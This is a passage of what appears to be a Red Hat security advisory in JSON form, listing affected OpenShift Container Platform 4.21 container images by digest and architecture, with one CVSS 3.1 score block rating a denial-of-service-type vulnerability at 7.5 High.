"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:18249c2a449d27f9c9d2d2914669bef0221e9d779630da939c8e45562e8eab55_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:251e0b536826e5353396f8069d508ef5f9cba6c38bc66be2aee9037759228834_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:848bdd1bed4275a4ea071b7351cafaed425fab7e82e3b71fb6d31b4a9a61d47a_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:b345413f9a1f1fef3738703c71bcb421b4eb795510637e8c5e8f6a20662035ad_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:1eb19e964813016a8287d03fbf76f10253b9403458297aac393cff083964bc86_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:844c042e56ff995d0fbcb560ca0bef9fe4799f7d4d36932034ea37fbc297c5cc_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:131459dfd1f4c159d75385b96fd46f8eb9aa260fd2b380406db49325bc858d6d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:8933b234c6bd8186738f18d257dfc32d35641538925b52afd1a0a13d65e22fc8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:04aaf3453b00bad5f560a3529744451850a7495a5b1c09d22602c4668d59334e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:4886d171f5973bfd35c0291181485bba6aa524eb8fc16d50a0fe58cf802e35f1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:12c93d59cee5e4b1e078728dcfff46a32d74022cadee43e8ba7ea6eec7c1550b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:13755e7b9d537d64ea31a50af4c425415aac6b2e73a6624c291b09cc10ccdc84_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2851992f2dc7ddfa802ec2902a59e3cb6c19f23b8810e770e82b487748610e64_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:61597437e96e4fe017f1156d30528ea4d14246b0d8e7b68c205c56f7a151283f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:b679772c7eb5295743d31ff4df6f1419084c02990679b86009c4708589fe6403_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:c16b49f06ab83306a1859620bc6b9721b8cd6af4a55248f55aad32da14b3b7c8_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:1304433ac42f7966801fc7adb9bab2cb85db100c27299f0817a60436a57118c5_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:4622e61163cba7f1fa87feddf2832e0c8cb4dae6fb70f41b6e03b39cb93770ff_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:9e390a25735b44286e3649b4872910720050d0f710feb67f914621db1913ce8e_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:b51f2f5767746f45c1a3092fe327d65f162b999c0e674764d861f168301b71e6_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:0101d5fe5eb0f2c3144ba364412dcd21c0c7b08c0beacd3fc5dd564767b2d9e0_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:0bc5a5a619cb16e67f81551ea4b96af7a8db26addfb202d9ca5ceab4168f459f_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5b379b10c95eb7a89203d552ee1c3437ce0afbe61fb0afbdff6f5f421962df5b_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:81cb7b7fa35e3474c1be5650beaf6f6e963ee2f739221d7226933e3aa6a3f226_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:313bd25c0339ea434c08a438eda7bd5e3323bf0e02934ee4d01eb31af658a07a_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:38ee956747c9e76adb8038bc81918a6fb8a800313a93cff8822d309466754b67_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:3d3258d77f4829041e29a9dea806a0041237646e65ad3c3007d7cd98ec15bfdc_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:da587c47cc75ef54935b580d8e40852523c707e52954bcccf0def9da3de88063_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:1a3732c862f54453a192ebf7727b2f0339909e2207b3ae809ffa321f14d1cc17_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:270d198ff926a597b38e25e78868bce6ffd76c9601ba71e56d6312f5a35e3d37_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:b45c8f4aa119aefaed6080c553d7414b4d25ddb0968147f1344c2a82671ad177_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:bcf37dd6a57b6d6ecbd834cf812adee2dc841b8bf1d08c21ea29a3c6aab4d405_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:5251c3ad369f33e07c6e24f482c562edce287bdae6b8e505ecb8d3cf09fc32be_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:7304e26ef6c8ab4d2c647cc2ba65af9a92fd0f1fead62da0c435d71b397aada8_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:c6abce790ae93c39059b7dbfef6899b2ec75ba1a9864509f6cce28b1d356407e_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:f39b80836b998e584dc235933e600ee12746a3bfb0079aea1476a1eecf8f446d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:399931f0229e6dd1c8da11cf570db838af5b8113d67e0071e8e7b1fdc59f735c_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:5df3c4493997002d40d9278e7ef6b90fb98905a2bba169b0410980d297bfade3_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:89b38bc6c2b4405d467684858b8a4f8980f6ad9d721e7ca75e9956f923639240_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:ab067ec0877565544332595cf9d023f4ad3479d940a8f3cb4f1eaf3f930d9e0f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:1659061e1d03edc348e920093f213b35e95512807ce7dd83b2f1bd0b012d7900_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:62075f81a8bc4ce5a7192023a80f2e27c2bc4fae547193776513d67fbddad601_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:750827c34059a77d8599b6171204bc17cf971c4b0e9470007f4db319df31c860_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:9324db9c450ee8a54926478918a4efa70943cbc29ae8e2e67f51fe60bfd75335_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:2d95f6a57074c1132b809a735cc09c4aaccbd08a2a689bc0ee87426f766733c3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:9b5c05ee9e7460a2a3fbf2539a4248581d4a69712a2be5601451019c52353cb2_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:b6809f3b2d4107dbb9e3338f63aa2f0646f19dd15a8980742e2aaa2e38d75362_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:c6e0d575be3fe6bab07ec95b244600e5eb6e8fcae5df1fd7b344381aae921c17_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:18f11df416a261b5f882d67f4de9a2dabbd8b80006ecabd033504d3b0fadb779_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:709239c59cc22bd41c553a7f30c147c4fb33ed6f560cba9ff976a966cc58dc3c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:af2f03bf9b66959ac4e8568bdf8ffe864faa8808bb6790b554b1c3d5d80ea112_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:bb8d6f977a5b10490657a0e713ce281ac0680bf68caf893c46fe9ca84093b4b1_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:3d7c4d5a5809c712563175779356907b945010bf1357b78382ae405d89a8fd57_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:4b5f35cd93750652837275a4227ee08c40b2b7769ffdeec8a4d7a32ace69bbce_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:5aefedbf52b1d9b3ce8f6283e0716d4706b82fde65461a6924889ee507dfaa87_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:a90a60e27885e3ac1f74d00cb255478652da90af02a3771750b8598a53e9e48a_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:15cf0592b04ce9f19f286634c3a03001ef16f37d89f7752222b167ccbae4f583_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:3a8ab1634350c3e9f3768b56beb304696d71f996f980ff3839c79e6eb4af1ea0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:b40b75179bce35e2b49402bd6e345f234223f6379a845972122b9ebeb36ac40a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:37bffa4965d7ec59ecbfe8abf0a23d1e0411f9445c27237f9ca923cd1b96cb66_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:4d2f0e638d7c2632738ffdca9c391df061bbbb623f67138031590ef31cde06e6_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:549711d0027ee642c77126ff2cc280fef4ac6fa4b28605b9cbda4e34e3fcedfc_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:5ae6198359a92af6c4b317806ec8a33ff53d44189d14561a8f8a3153d7afdb81_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:c4d991da60458b7fd027719a7fe411bdfe82b192e7e882767dda61037e28aa3e_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:0670c2bb289901d477fbc283a5aea07cd38d7a7e19b16a9ac16f681bc94b2c62_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:81399846b57621b98c097a30f13e778d9842a8dc443ce62a37dad974b1f7f439_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a4de71b4f22f9f5f46300ff38cfda0e4b5647f286fd5bd365d9e0a6cadd94d5d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:ac86e849e17e9a83d6683ed0469538f758a53aec6fbe89df675c66ef66f007e6_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:2ecec54cb74d1a34486e71b455886ca4a88ee3b4f3e21fba7d7e3d17b00179fc_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5c538e8d7cb551cac0459c1971e8bf9800d1db3eaf7e66639ebaeb6c3d9305bb_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:ad92acc19589b0305162857f2a14d8174fc4cb90d5ffc09991f49de756ae61c7_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:edcabf99710bd0952e329b0edab7b7a86b93f9d34dfe17d3391c9405210f63dd_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:48d9d26f06bc34472304b35f6559e428bd1d599267d1298ccf2b199533af4749_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:52e53301f201de393f91cf3084e814e35fe6f93f0432969fd4c511c2ac51b911_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:7ed4a15043060bc2f6ed0ce98efca2721fe19efd8705ecc23ec410de836b6ac6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:b39b3e7a8be95fb0190842c892edaac58878ef2a3c0e59a59365504aef68c101_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1571d23b7a60a14ca1f6942daa5a4681fec9f1fbdfcece0bc76d552ab96dc45a_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:6427f32947afaea5139673b7561ed3ea36b6d0a9272388146c96636a461d7e4b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:cf354f87320a3b730ade16800a31fd18edd643aa6b652d0249f6f531db8932ad_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dd52af230c401d3e17f80ed764ffc2d176c4f1278fd8be791d8098094acbbfa0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2131f098ee848c2a4190c1fea7410df1e465efd7bec4e62b36df7cfce07872ac_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2fb1acc8f1c8f4091671c53c1e2944c91a123a386233ae093def99b6ef6963a2_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:3c497ebfc92e76d91bdb7d81f44d42d245a87c85ca8752f933a89121e372fcf9_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:6032a0dbc7f698d3519118fb73fa99395d08be3c022231a293ba265442c31371_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:47c2783399e696c5e9c87ba45a653580d79f0ff9da2452c6bddc78c504a593be_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:6d6bbab810dd6cf82997f98c6eb27474c2f28ee6139d254e163045ae881ebca3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:ba9149621bc099a23abdf277f9dd9e1577d3e758fbcfeba8a85b4aba674822c4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:f607a04fbff99b8e9fe049182f651c9be0492e6534013aff0743dd5a24954051_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:874f7948285d470527af2f674fc82981f2c2b375ab056e06710d4b63f467db08_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:c61aadb6f4c72f47bae25eb36b2b392432b9d1c52c25deb6c168689696092d4d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:d6abeb46b250118c1bc6d79a205fb2a28f1e2c87cc1782856e2b08d57726a242_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:f4dc5a0f19fd2ce83023001e4b8bd3f06d0f551187a8da64e3882783190a48f4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:a9600a1e30aff273ea62fac0e0b765c5aa74f41c3a770740fe7a6bd104d845c0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:c86603a6876ffc9fda19897fae53ce46f5ed1ec490e30c684a224c453146d9f7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:db4ea6f06a95e645bdc99ba1e80ce72119a0333c222c8565139a4481715e943a_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:f54a077136b77f7b7f4158ebe48dd8c327ed24f31d1f60bb74e377289c8f388d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/frr-rhel9@sha256:2b28ccc2527b7ee1d7d5eb702ce0cbda80f65f2b70380dcd461b078e85acdb4d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/frr-rhel9@sha256:344986bd16bbbd9fafe104e63c43c8049dec8a4851db413a807e8ae947a6d13c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/frr-rhel9@sha256:431d1f322a4f0234798ba728670ada359bc7671ce4f297907c0c8fcef3f0a881_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/frr-rhel9@sha256:6910c5b5446ae3efd828d830d67e07d64fcd15d03b188c54bcf222c0d9f1f074_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:3ee9539604dee7477d19a5769831e053bfa7b1e5611763a7eadad34bda111015_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:55ba05713a6b9e8a0cde50390e1935ae37f8f8dc8c98c7ee926a69c02605c7fe_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:79fa1f3a57e1db94048a410727dd6bacd4683e1a54bf699d3dd318a84a9ed45b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:b4fd7ff14b54766e058b847d7f91c13dc17bf661e45c07bca5bc9754d20e14ae_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:6c229d2b0ac3ea07cc7703cb778ee27a59b975a194041efa8cb3eea86a48652e_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:846447487434a57df9b33f06fb5704fcc96ffa518baf6d99223c4e1795e5c643_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:9650cffbe1a64468fef27a62a960b67059d0d6ed59e2ef09c7900d29133c0864_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:a3972c8b0f417fadf45f1cc1a14543f02586b364171b8e60e7bcb90c98623dd0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:37c8160b545194fe3a91940a9fc8911383fd3674dcbc3135454b6872b04d7c42_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:962110a1c424f7893ae4cf2b7bc6a57a8c0070cbc699029fb0c7503217065dfb_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:e6ea068305ca712061e83e4352b3fa9c2431dca533473928fa3c87ad1dc45a01_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f247b47505e0947c5a733c938a17a899af2faa5f3f0ae29b17ba0a0e30f99235_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:934795c45d33ed58aa148aca6a165a4f38ec9ce88413ed62404da19627e4c465_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:a1a7aff47d11acf486bb1e83bcb6aaffe8bc50dd4c655150708ede4cb9359c6d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:b45ff6b59330f93a7e91e911cb12a3676301613d69b500f139f0c414281bfa84_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:e0b7b9cb40746ca2b38791ca125dae22dff7f6afadce2c31c7299c69dc316fac_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/network-tools-rhel9@sha256:002057809ba8771cebee023519dbfb91a5b4f5102a292695a7d6746e93faaeaf_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/network-tools-rhel9@sha256:146c6b876b93819d9f783515ad0214f1d0609905d5b0239c1d1c377a8a77f53f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/network-tools-rhel9@sha256:68fbb392a2e08a7c32f0bcfa78b1e4aacb67df3cae696160d7946013d97d54b7_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/network-tools-rhel9@sha256:b576d483f631013f1beda76d250a739cf9680f8dcf53b4f0146e7998d6c9f0dd_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:20544c6de0614e3e195c9f45aea764132229c619228fa4483f7e418297b96ff6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:7c4b7e341a617380ab6f0dd9a1012fdfe9908afd744a2c81cae644538f881602_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:e4c9cd54f5209f2b1d5b53ded3d40292253c74f8ae3d4db626756ddbc6e11c60_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:f3eaf72bb86601787b4b2f26801528061ac5759c3ff7dc1caabb33a43ff556c5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:32532889f9a19086cc0567dd0375f43e303cb46cc646d8ff896d3599e7fa3cff_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:660e0c3c9ce138815279455fc77017a85398ee6130f0ed5d73c780ba454c6a90_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:7cd0406733f1313f3ec2011e8bce76ab83b044a75e5025fd8913796f03ad9356_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:8c41cf0e7e426f5092ac57f893c807b846a5737aa27882068ec6a982758aa8f1_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:3f53284ee9720572b864ab12a87dfb98736e26dfd34e87f3967ec4800bc06b62_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:45905152fdf546d05fe323898009781331f8665bb32fe7d91d2fad384ec8732e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:45c1bb0d34fbf71bbd0caa65dc531e67575f34d7322e8d5313583aae4e0e2eab_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:f244e67bad477b8d5c57b74804a06fbd7d9403ae3d475ac2af71d927c6f888bd_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:0d786d1acd2b6102b55179f28ea29579c9f95593888305a12ff8574adec158d6_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:6f0132e14e165e5d59ab20bb4e869d068aa8954e5aeae47c29cb84cc370b2b0a_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:af02bf26ff1d9ffc8db66969f140e90d3318b894f63931b47818143ab1e99ff2_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:fa8c6beaf4228a8f690b70daef15fdde242c3d196e783deaaf4d3769db488d74_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:22f01a38260fffda38bb27bd7b1d5d1af9018f7269fe989778a94046f0b58ade_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:480b04a55b7b86e80cc79c6695ab39b68a9714588eaa2d2c7264481541015651_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:c4d2014bca6fbda58a4797f0f2d5732efc3692a609899ba8ca063afd1103fd77_s390x",
